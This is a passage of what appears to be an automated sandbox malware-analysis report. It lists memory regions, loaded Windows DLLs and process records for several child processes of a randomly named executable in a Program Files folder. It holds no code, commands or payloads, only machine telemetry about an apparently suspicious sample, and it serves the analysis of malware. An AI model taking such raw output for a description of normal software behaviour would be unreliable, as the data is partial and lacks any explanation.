0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5383 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5384 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5385 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5386 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 5387 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 122 os_tid = 0x12e4 Thread: id = 150 os_tid = 0x2fc Process: id = "33" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd3ea000" os_pid = "0x490" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4129 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4130 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4131 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4132 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4133 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4134 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4135 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4136 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4137 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4138 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4139 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4140 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4141 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4142 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4143 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4144 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4524 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 4525 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4526 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4527 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4528 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4529 start_va = 0x5d0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4530 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4531 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4532 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4533 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4534 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4869 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4870 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4871 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 4872 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4873 start_va = 0x700000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 4874 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4875 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4876 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4877 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4878 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4879 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4880 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4881 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4882 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4883 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4884 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4885 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4886 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4887 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 4888 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 4889 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 4890 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4891 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5434 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5435 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5436 start_va = 0x800000 end_va = 0x987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 5437 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 123 os_tid = 0xa28 Thread: id = 151 os_tid = 0x61c Process: id = "34" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd222000" os_pid = "0x138c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4149 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4150 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4151 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4152 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4153 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4154 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4155 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4156 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4157 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4158 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4159 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4160 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4161 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4162 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4163 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4164 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4535 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 4536 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4537 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4538 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4539 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4540 start_va = 0x440000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4541 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4542 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4543 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4544 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4545 start_va = 0x560000 end_va = 0x61dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4956 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4957 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4958 start_va = 0x620000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 4959 start_va = 0x660000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 4960 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4961 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4962 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 4963 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 4964 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4965 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4966 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4967 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4968 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4985 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4986 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4987 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4988 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4989 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5477 start_va = 0x760000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 5478 start_va = 0x7a0000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 5479 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5480 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5481 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5482 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5483 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5484 start_va = 0x8a0000 end_va = 0xa27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 5485 start_va = 0xa30000 end_va = 0xa59fff monitored = 0 entry_point = 0xa35680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5486 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 124 os_tid = 0xabc Thread: id = 161 os_tid = 0x3a8 Thread: id = 169 os_tid = 0x1188 Process: id = "35" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd22f000" os_pid = "0x928" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4173 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4174 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4175 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4176 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4177 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4178 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4179 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4180 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 